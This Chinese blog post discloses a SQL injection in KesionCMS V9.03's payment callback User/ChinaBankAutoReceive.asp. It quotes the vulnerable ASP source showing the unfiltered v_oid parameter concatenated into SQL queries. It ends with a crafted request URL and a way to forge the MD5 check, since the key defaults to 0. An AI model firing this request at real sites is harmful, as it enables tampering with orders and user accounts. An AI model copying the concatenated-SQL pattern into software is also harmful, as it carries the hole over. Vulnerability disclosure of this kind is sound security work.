博客

KesionCMS V9.03 Final SQL注射

  • Post author:
  • Post category:其他



作者:My5t3ry



漏洞存在于User/ChinaBankAutoReceive.asp


01
<%@LANGUAGE=


"VBSCRIPT"


CODEPAGE=


"936"


%>

02
<%option explicit%>

03
<!--#include file=


"../Conn.asp"


-->

04
<!--#include file=


"../Plus/md5.asp"


-->

05
<!--#include file=


"../KS_Cls/Kesion.MemberCls.asp"


-->

06
<!--#include file=


"payfunction.asp"


-->

07
<%

08
'****************************************************

09
' Software name:Kesion CMS 9.0

10
' Email: service@kesion.com . QQ:111394,9537636

11
' Web:

http://www.kesion.com


http://www.kesion.cn

12
' Copyright (C) Kesion Network All Rights Reserved.

13
'****************************************************

14
Response.Buffer = true

15
Response.Expires = 1

16
Response.CacheControl =


"no-cache"

17

18
Dim


KSUser:


Set


KSUser=


New


UserCls

19
Dim


KS:


Set


KS=


New


PublicCls

20
Dim


PaymentPlat:PaymentPlat=1

21

22
Dim


RSP:


Set


RSP=Server.CreateObject(


"ADODB.RECORDSET"


)

23
RSP.Open


"Select top 1 * From KS_PaymentPlat where id="


& PaymentPlat,conn,1,1

24
If


RSP.Eof


Then

25
RSP.Close:


Set


RSP=


Nothing

26
Response.Write


"Error!"

27
Response.


End


()

28
End


If

29
Dim


AccountID:AccountID=RSP(


"AccountID"


)

30
Dim


MD5Key:MD5Key=RSP(


"MD5Key"


)

31
Dim


PayOnlineRate:PayOnlineRate=KS.ChkClng(RSP(


"Rate"


))

32
Dim


RateByUser:RateByUser=KS.ChkClng(RSP(


"RateByUser"


))

33
RSP.Close:


Set


RSP=


Nothing

34

35


Call


ChinaBank()

36
'网银在线返回

37
Sub


ChinaBank()

38


Dim


v_oid,v_pmode,v_pstatus,v_pstring,v_string,v_amount,v_moneytype,remark2,v_md5str,text,md5text,zhuangtai

39
' 取得返回参数值

40
v_oid=request(


"v_oid"


)


' 商户发送的v_oid定单编号

41
v_pmode=request(


"v_pmode"


)


' 支付方式(字符串)

42
v_pstatus=request(


"v_pstatus"


)


' 支付状态 20(支付成功);30(支付失败)

43
v_pstring=request(


"v_pstring"


)


' 支付结果信息 支付完成(当v_pstatus=20时);失败原因(当v_pstatus=30时);

44
v_amount=request(


"v_amount"


)


' 订单实际支付金额

45
v_moneytype=request(


"v_moneytype"


)


' 订单实际支付币种

46
remark2=request(


"remark2"


)


' 备注字段2

47
v_md5str=request(


"v_md5str"


)


' 网银在线拼凑的Md5校验串

48
if request(


"v_md5str"


)=


""


then

49
response.Write(


"v_md5str:空值"


)

50
response.end

51
end if

52
text = v_oid&v_pstatus&v_amount&v_moneytype&MD5Key


'md5校验

53
md5text = Ucase(trim(md5(text,32)))


'商户拼凑的Md5校验串

54
if md5text<>v_md5str then


' 网银在线拼凑的Md5校验串 与 商户拼凑的Md5校验串 进行对比

55


response.write(


"error"


)


'告诉服务器验证失败,要求重发

56


response.end


'中断程序

57
else

58


response.write(


"ok"


)

59


if v_pstatus=20 then


'支付成功

60
Call


UpdateOrder(v_amount,remark2,v_oid,v_pmode)

61
Conn.Execute(


"Update KS_LogMoney Set PaymentID=1 Where OrderID='"


& v_oid &


"'"


)

62


else

63


response.write(


"error"


)


'告诉服务器验证失败,要求重发

64


response.end


'中断程序

65


end if

66
end if

67
end


Sub

68
%>

69
上面代码中的v_oid=request(


"v_oid"


)没有过滤,然后就调用了

70

71
Call


UpdateOrder(v_amount,remark2,v_oid,v_pmode)

我们接着看UpdateOrder


001
Sub


UpdateOrder(v_amount,remark2,v_oid,v_pmode)

002


Dim


KSUser:


Set


KSUser=


New


UserCls

003


Dim


UserName,MoneyType,Money,Remark,sqlUser,rsUser,orderid,mobile,Action

004


orderid=v_oid

005


IF Cbool(KSUser.UserLoginChecked)


Then


UserName=KSUser.UserName


Else


UserName=KS.S(


"UserName"


)

006

007
'=======================如果从request里得不到数据,则重新取值=================

008
If


UserName=


""


Then


UserName=SUserName

009
Dim


UserCardID

010
UserCardID=KS.ChkClng(KS.S(


"UserCardID"


))

011
iF UserCardID=0


Then


UserCardID=sUserCardID

012
Action=KS.G(


"Action"


):


If


Action=


""


Then


Action=Saction

013
'==============================================================================

014

015


Mobile=KSUser.GetUserInfo(


"Mobile"


)

016
Money=v_amount

017
Remark=remark2

018
Dim


RSLog,RS

019
Set


RSLog=Server.CreateObject(


"ADODB.RECORDSET"


)

020
RSLog.Open


"Select top 1 * From KS_LogMoney where orderid='"


& v_oid &


"'"


,Conn,1,1

021
if RSLog.Eof


And


RSLog.BoF


Then

022
Select


Case


Action

023
case


"shop"


'商城中心购物

024
Set


RS=Server.CreateObject(


"ADODB.RECORDSET"


)

025
RS.Open


"Select top 1 * From KS_Order Where OrderID='"


& v_oid &


"'"


,Conn,1,3

026
If


RS.Eof


Then

027


RS.Close:


Set


RS=


Nothing

028


KS.Die


"<br><li>支付过程中遇到问题,请联系网站管理员!"

029
End


If

030


If


Mobile=


""


Then

031


Mobile=RS(


"Mobile"


)

032


End


If

033


RS(


"MoneyReceipt"


)=Money

034


If


Money>=RS(


"MoneyTotal"


)


Then

035
RS(


"PayStatus"


)=1


'已付清

036


ElseIf


Money<>0


Then

037
RS(


"PayStatus"


)=2


'已收定金

038


Else

039
RS(


"PayStatus"


)=0


'未付款

040


End


If

041


Dim


OrderStatus:OrderStatus=rs(


"status"


)

042


RS(


"Status"


)=1

043


RS(


"PaymentPlatId"


)=KS.ChkClng(Request(


"PaymentPlat"


))


'支付接口ID

044


RS(


"PayTime"


)=now


'记录付款时间

045


RS.Update

046


orderid=RS(


"OrderID"


)

047


Dim


XID:XID=RS(


"ID"


)

048


Call


KS.MoneyInOrOut(rs(


"UserName"


),RS(


"Contactman"


),Money,2,1,now,rs(


"orderid"


),


"System"


,


"为购买订单:"


&v_oid &


"使用"


& v_pmode &


"在线充值"


,0,0,0)

049


Call


KS.MoneyInOrOut(rs(


"UserName"


),RS(


"Contactman"


),Money,4,2,now,rs(


"orderid"


),


"System"


,Remark,0,0,0)

050

051

052
'====================更新库存量========================

053
Dim


rsp:set rsp=conn.execute(


"select id,title from ks_product where id in(select proid from KS_OrderItem where orderid='"


& rs(


"orderid"


) &


"')"


)

054
do while not rsp.eof

055

056


dim rsi:set rsi=conn.execute(


"select amount,attrid from ks_orderitem where orderid='"


& rs(


"orderid"


) &


"' and proid="


& rsp(0))

057


if not rsi.eof then

058


if OrderStatus<>1


Then


'扣库存量

059


If


RSI(


"AttrID"


)<>0


Then

060


Conn.Execute(


"update KS_ShopSpecificationPrice set amount=amount-"


& RSI(0) &


" Where amount>="


& RSI(0) &


" and ID="


& RSI(1))

061


Else

062


conn.execute(


"update ks_product set totalnum=totalnum-"


& rsi(0) &


" where totalnum>="


& rsi(0) &


" and id="


& rsp(0))

063


End


If

064


End


If

065


end if

066


rsi.close

067


set rsi=nothing

068

069


'Call KS.ScoreInOrOut(UserName,1,KS.ChkClng(rsp(0))*amount,"系统","购买商品<font color=red>" & rsp("title") & "</font>赠送!",0,0)

070

071
rsp.movenext

072
loop

073
rsp.close

074
set rsp=nothing

075
'================================================================

076

077
RS.Close:


Set


RS=


Nothing

078
IF KS.C(


"UserName"


)<>


""


Then


response.Redirect


"User_Order.asp?Action=ShowOrder&ID="


& XID

079
Case


else


'会员中心充值

080
Set


rsUser=Server.CreateObject(


"Adodb.RecordSet"


)

081
sqlUser=


"select top 1 * from KS_User where UserName='"


& UserName &


"'"

082
rsUser.Open sqlUser,Conn,1,1

083
if rsUser.bof and rsUser.eof then

084
Response.Write


"<br><li>充值过程中遇到问题,请联系网站管理员!"

085
rsUser.close:set rsUser=


Nothing

086
exit sub

087
end if

088
Dim


RealName:RealName=rsUser(


"RealName"


)

089
Dim


Edays:Edays=rsUser(


"Edays"


)

090
Dim


BeginDate:BeginDate=rsUser(


"BeginDate"


)

091
rsUser.Close :


Set


rsUser=


Nothing

092

093
If


UserCardID<>0


Then


'充值卡

094


Call


UpdateByCard(0,UserCardID,UserName,RealName,Edays,BeginDate,v_oid,v_pmode)

095
Else

096


Call


KS.MoneyInOrOut(UserName,RealName,Money,3,1,now,v_oid,


"System"


,v_pmode &


"在线充值,订单号为:"


& v_oid,0,0,0)

097
End


If

098

099

100
End


Select

101

102
End


If

103
RSLog.Close:


Set


RSLog=


Nothing

104
End


Sub

105

106
RSLog.Open


"Select top 1 * From KS_LogMoney where orderid='"


& v_oid &


"'"


,Conn,1,1

这句带入SQL了!那么然后构造参数才能触发漏洞呢?

我们这样构造:


/User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B


其中的v_oid带入我们的SQL注射语句…你懂的,后面的v_md5str是md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)得到的,MD5Key的值来自数据库值为0

简单地说,v_oid构造SQL后,md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)计算出v_md5str,然后提交就行了